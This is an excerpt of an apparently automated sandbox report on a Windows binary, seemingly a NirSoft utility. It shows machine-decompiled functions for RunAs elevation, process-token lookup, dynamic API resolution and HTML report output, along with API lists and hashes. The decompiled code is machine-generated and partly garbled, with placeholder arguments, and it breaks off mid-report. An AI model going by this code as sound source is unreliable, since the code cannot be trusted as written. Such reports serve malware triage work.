				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}

APIs

GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
memset.MSVCRT ref: 00401C4F
memset.MSVCRT ref: 00401C68

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00401C8F
memset.MSVCRT ref: 00401C9B
ShellExecuteExW.SHELL32(?), ref: 00401CD5
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
GetExitCodeProcess.KERNEL32 ref: 00401CF6
GetLastError.KERNEL32 ref: 00401D0E

Strings

<, xrefs: 00401CB9
RunAs, xrefs: 00401CC0
/SpecialRun %I64x %d, xrefs: 00401C84
@, xrefs: 00401CC7

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
String ID: /SpecialRun %I64x %d$<$@$RunAs
API String ID: 903100921-3385179869
Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}

APIs

memset.MSVCRT ref: 00409AB7
memset.MSVCRT ref: 00409ACF
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
_snwprintf.MSVCRT ref: 00409C5A

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

memset.MSVCRT ref: 00409B25
GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
memset.MSVCRT ref: 00409BC7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

Strings

GetTokenInformation, xrefs: 00409B43
%s\%s, xrefs: 00409C51
Y@, xrefs: 00409BA9

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
String ID: %s\%s$GetTokenInformation$Y@
API String ID: 3504373036-27875219
Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
FreeLibrary.KERNEL32(00000000), ref: 00409202

Strings

GetModuleBaseNameW, xrefs: 00409198
GetModuleInformation, xrefs: 004091DC
EnumProcesses, xrefs: 004091CB
EnumProcessModules, xrefs: 004091A9
psapi.dll, xrefs: 00409180
GetModuleFileNameExW, xrefs: 004091BA

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Freememsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1182944575-70141382
Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C

Uniqueness

Uniqueness Score: -1.00%

Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A

Strings

Process32First, xrefs: 00409143
kernel32.dll, xrefs: 004090F8
Module32Next, xrefs: 00409132
CreateToolhelp32Snapshot, xrefs: 00409110
Process32Next, xrefs: 00409154
Module32First, xrefs: 00409121

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

APIs

memset.MSVCRT ref: 00409FCA
memset.MSVCRT ref: 00409FDF
_snwprintf.MSVCRT ref: 00409FF9
_snwprintf.MSVCRT ref: 0040A018
memset.MSVCRT ref: 0040A04A
memset.MSVCRT ref: 0040A05F
memset.MSVCRT ref: 0040A074
_snwprintf.MSVCRT ref: 0040A08E
_snwprintf.MSVCRT ref: 0040A0AB

Strings

%%0.%df, xrefs: 00409FEC, 0040A081

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

APIs

LoadMenuW.USER32 ref: 00406236

Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7

DestroyMenu.USER32(00000000), ref: 00406254
CreateDialogParamW.USER32 ref: 004062A9
GetDesktopWindow.USER32 ref: 004062B4
CreateDialogParamW.USER32 ref: 004062C1
memset.MSVCRT ref: 004062DA
GetWindowTextW.USER32 ref: 004062F1
EnumChildWindows.USER32 ref: 0040631E
DestroyWindow.USER32(00000005), ref: 00406327

Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2

Strings

caption, xrefs: 00406308

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

APIs

memset.MSVCRT ref: 0040821C
memset.MSVCRT ref: 00408231
memset.MSVCRT ref: 00408246
_snwprintf.MSVCRT ref: 0040826E
wcscpy.MSVCRT ref: 0040828A
_snwprintf.MSVCRT ref: 004082D3

Strings

<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
<table dir="rtl"><tr><td>, xrefs: 00408284
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

APIs

wcschr.MSVCRT ref: 00409223
wcscpy.MSVCRT ref: 00409233

Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1

wcscpy.MSVCRT ref: 00409282
wcscat.MSVCRT ref: 0040928D
memset.MSVCRT ref: 00409269

Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E

memset.MSVCRT ref: 004092B1
memcpy.MSVCRT ref: 004092CC
wcscat.MSVCRT ref: 004092D8

Strings

\systemroot, xrefs: 00409240

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
strlen.MSVCRT ref: 00409CE4
strlen.MSVCRT ref: 00409CF1

Strings

kernel32.dll, xrefs: 00409C8B
GetProcAddress, xrefs: 00409C98, 00409C9D
LdrGetProcedureAddress, xrefs: 00409CBA
ntdll.dll, xrefs: 00409CB3

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
API String ID: 1027343248-2054640941
Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25
libraryloaderCOMMON

